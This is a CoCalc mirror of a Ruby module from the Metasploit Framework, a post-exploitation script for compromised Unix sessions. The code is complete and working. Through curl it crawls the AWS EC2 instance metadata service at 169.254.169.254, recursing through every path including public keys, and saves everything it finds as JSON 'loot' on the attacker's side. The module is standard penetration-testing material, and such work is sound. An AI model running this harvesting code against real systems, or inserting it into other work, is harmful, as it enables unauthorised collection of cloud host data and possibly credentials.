Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/multi/gather/aws_ec2_instance_metadata.rb
19535 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  def initialize(info = {})

8
    super(

9
      update_info(

10
        info,

11
        'Name' => 'Gather AWS EC2 Instance Metadata',

12
        'Description' => %q{

13
          This module will attempt to connect to the AWS EC2 instance metadata service

14
          and crawl and collect all metadata known about the session'd host.

15
        },

16
        'License' => MSF_LICENSE,

17
        'Author' => [

18
          'Jon Hart <jon_hart[at]rapid7.com>' # original metasploit module

19
        ],

20
        # TODO: is there a way to do this on Windows?

21
        'Platform' => %w[unix],

22
        'SessionTypes' => %w[shell meterpreter],

23
        'References' => [

24
          [ 'URL', 'http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html' ]

25
        ],

26
        'Notes' => {

27
          'Stability' => [CRASH_SAFE],

28
          'SideEffects' => [],

29
          'Reliability' => []

30
        }

31
      )

32
    )

33


34
    register_advanced_options(

35
      [

36
        OptString.new('TARGETURI', [true, 'AWS EC2 Instance metadata URI', 'http://169.254.169.254/latest/meta-data/'])

37
      ]

38
    )

39
  end

40


41
  def check_aws_metadata

42
    resp = simple_get(@target_uri)

43
    unless resp =~ /^instance-id$/

44
      fail_with(Failure::BadConfig, 'Session does not appear to be on an AWS EC2 instance')

45
    end

46
    resp

47
  end

48


49
  def check_curl

50
    unless cmd_exec('curl --version') =~ /^curl \d/

51
      fail_with(Failure::BadConfig, 'curl is not installed')

52
    end

53
  end

54


55
  def get_aws_metadata(base_uri, base_resp)

56
    r = {}

57
    base_resp.split(/\r?\n/).each do |l|

58
      new_uri = "#{base_uri}#{l}"

59
      if l =~ %r{/$}

60
        # handle a directory

61
        r[l.gsub(%r{/$}, '')] = get_aws_metadata(new_uri, simple_get(new_uri))

62
      elsif new_uri.to_s =~ %r{/public-keys/} && /^(?<key_id>\d+)=/ =~ l

63
        # special case handling of the public-keys endpoint

64
        new_uri = new_uri.slice(0..(new_uri.index(%r{/public-keys/}) + '/public-keys'.length))

65
        key_uri = "#{new_uri}#{key_id}/"

66
        key_resp = simple_get(key_uri)

67
        r[key_id] = get_aws_metadata(key_uri, key_resp)

68
      else

69
        r[l] = simple_get(new_uri)

70
      end

71
    end

72
    r

73
  end

74


75
  def run

76
    check_curl

77
    resp = check_aws_metadata

78


79
    print_status('Gathering AWS EC2 instance metadata')

80
    metadata = get_aws_metadata(@target_uri, resp)

81


82
    metadata_json = JSON.pretty_generate(metadata)

83
    file = store_loot('aws.ec2.instance.metadata', 'text/json', session, metadata_json, 'aws_ec2_instance_metadata.json', 'AWS EC2 Instance Metadata')

84


85
    if datastore['VERBOSE']

86
      vprint_good('AWS EC2 instance metadata')

87
      print_line(metadata_json)

88
    end

89
    print_good("Saved AWS EC2 instance metadata to to #{file}")

90
  end

91


92
  def setup

93
    @target_uri ||= URI(datastore['TARGETURI'])

94
  rescue ::URI::InvalidURIError

95
    fail_with(Failure::BadConfig, "Invalid TARGETURI: #{datastore['TARGETURI']}")

96
  end

97


98
  def simple_get(url)

99
    vprint_status("Fetching #{url}")

100
    cmd_exec("curl -s #{url}")

101
  end

102
end

103


104